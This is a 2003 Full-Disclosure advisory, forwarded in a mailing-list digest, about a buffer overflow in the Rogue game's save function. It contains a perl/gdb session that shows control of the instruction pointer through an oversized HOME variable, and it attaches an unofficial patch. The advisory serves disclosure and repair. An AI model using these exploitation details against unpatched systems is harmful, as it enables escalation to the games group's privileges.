[Please patch if you play Rogue on any platform -- Raju] This is an RFC 1153 digest. (1 message) ----------------------------------------------------------------------
MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="-293465837-1442508392-1045861660=:12401" Return-Path: <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]> From: Ulf Harnhammar <[EMAIL PROTECTED]> Sender: [EMAIL PROTECTED] To: [EMAIL PROTECTED] cc: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: [Full-Disclosure] Rogue buffer overflow Date: Fri, 21 Feb 2003 22:07:40 +0100 (CET) This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to [EMAIL PROTECTED] for more info. ---293465837-1442508392-1045861660=:12401 Content-Type: TEXT/PLAIN; charset=US-ASCII Rogue buffer overflow PROGRAM: Rogue VENDOR: Tim Stoehr et al. DOWNLOAD URL: http://ibiblio.org/pub/Linux/games/dungeon/!INDEX.html (any file called "*rogue*" in that directory) DMOZ/ODP: http://dmoz.org/Games/Video_Games/Roleplaying/Rogue-like/ DESCRIPTION: Rogue is a text-based role-playing computer game with a long history. It is the first of the rogue-like games. SUMMARY: Rogue's save game function (capital S) suffers from a buffer overflow. The program is usually installed setgid games, so successful exploitation means getting that group's access rights. TECHNICAL DETAILS: If you specify a file name for saving beginning with a tilde (~), Rogue will replace that character with the contents of the environment variable HOME. This happens in the function save_into_file() in save.c. The concatenation of that environment variable with the rest of the file name takes place in a buffer of 80 characters, and the code doesn't check if it is overrun or not. We can exploit this by giving the HOME environment variable a value that is 111 characters long, and by saving a game with a file name that is two characters long: a tilde (~) and one more character. That second character in the file name will be the highest byte in the address that the processor jumps to. The other bytes in the address come from the HOME environment variable. Here is a session capture that illustrates this problem: $ export HOME=`perl -e 'print "U" x 111;'` $ gdb rogue GNU gdb Red Hat Linux (5.2-2) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) r Starting program: /home/vsu/secwork/rogue/rogue [rogue session snipped] file name? ~A ~A-more- problem accessing the save file Program received signal SIGSEGV, Segmentation fault. 0x41555555 in ?? () (gdb) bt #0 0x41555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x1f 31 ecx 0x656c69 6646889 edx 0xff646b68 -10196120 ebx 0x4213030c 1108542220 esp 0xbfffdd90 0xbfffdd90 ebp 0x55555555 0x55555555 esi 0x40013020 1073819680 edi 0xbfffde84 -1073750396 eip 0x41555555 0x41555555 eflags 0x10286 66182 COMMUNICATION WITH VENDOR: The program seems to be unmaintained, so I wrote an unofficial patch instead. MY PATCH: I have attached a patch that corrects this problem. I have patched against rogue985. // Ulf Harnhammar VSU Security will audit PHP and Perl code for money [EMAIL PROTECTED] ---293465837-1442508392-1045861660=:12401 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="rogue.patch" Content-Transfer-Encoding: BASE64 Content-ID: <[EMAIL PROTECTED]> Content-Description: Content-Disposition: attachment; filename="rogue.patch" LS0tIHNhdmUuYy5vbGQJV2VkIEZlYiAxOSAwMjozNjo0OCAyMDAzDQorKysg c2F2ZS5jCVdlZCBGZWIgMTkgMDI6NDc6MzMgMjAwMw0KQEAgLTY3LDggKzY3 LDEwIEBADQogDQogCWlmIChzZmlsZVswXSA9PSAnficpIHsNCiAJCWlmICho cHRyID0gbWRfZ2V0ZW52KCJIT01FIikpIHsNCi0JCQkodm9pZCkgc3RyY3B5 KG5hbWVfYnVmZmVyLCBocHRyKTsNCi0JCQkodm9pZCkgc3RyY2F0KG5hbWVf YnVmZmVyLCBzZmlsZSsxKTsNCisJCQkvKiBTZWN1cml0eSBmaXgsIFVsZiBI YXJuaGFtbWFyIDIwMDMgKi8NCisJCQkodm9pZCkgc3RybmNweShuYW1lX2J1 ZmZlciwgaHB0ciwgc2l6ZW9mKG5hbWVfYnVmZmVyKSk7DQorCQkJKHZvaWQp IHN0cm5jYXQobmFtZV9idWZmZXIsIHNmaWxlKzEsIHNpemVvZihuYW1lX2J1 ZmZlcikgLSBzdHJsZW4oaHB0cikpOw0KKwkJCW5hbWVfYnVmZmVyW3NpemVv ZihuYW1lX2J1ZmZlcikgLSAxXSA9ICdcMCc7DQogCQkJc2ZpbGUgPSBuYW1l X2J1ZmZlcjsNCiAJCX0NCiAJfQ0K ---293465837-1442508392-1045861660=:12401-- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ It is the mind that moves ================================================ To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject header. Check archives at http://www.mail-archive.com/ilugd%40wpaa.org
